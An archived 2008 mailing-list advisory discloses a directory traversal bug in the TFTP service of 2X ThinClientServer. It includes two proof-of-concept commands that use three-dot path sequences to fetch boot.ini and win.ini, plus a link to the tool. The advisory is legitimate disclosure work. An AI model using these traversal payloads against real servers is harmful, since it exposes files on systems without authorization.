lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 31 Mar 2008 21:48:47 +0200 From: Luigi Auriemma <aluigi@...istici.org> To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk, packet@...ketstormsecurity.org, cert@...t.org, news@...uriteam.com Subject: Directory traversal in 2X ThinClientServer v5.0_sp1-r3497 ####################################################################### Luigi Auriemma Application: 2X ThinClientServer http://www.2x.com/thinclientserver/ Versions: <= v5.0_sp1-r3497 (TFTPd.exe <= 3.2.0.0) Platforms: Windows Bug: directory traversal Exploitation: remote Date: 29 Mar 2008 Author: Luigi Auriemma e-mail: aluigi@...istici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >>From the manual: "2X ThinClientServer allows you to deploy a thin client OS to low-cost thin client devices and existing PCs, and centrally manage settings and configure to which terminal servers (Windows or Linux) a user should log on to." ####################################################################### ====== 2) Bug ====== The 2X TFTP Service enabled by default in ThinClientServer is affected by a directory traversal vulnerability exploitable through the usage of a sequence of 3 dots (instead of the classical two) for reaching the various parent directories. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/tftpx.zip tftpx SERVER .../.../.../.../.../.../boot.ini none tftpx SERVER ...\...\...\...\...\...\windows\win.ini none ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists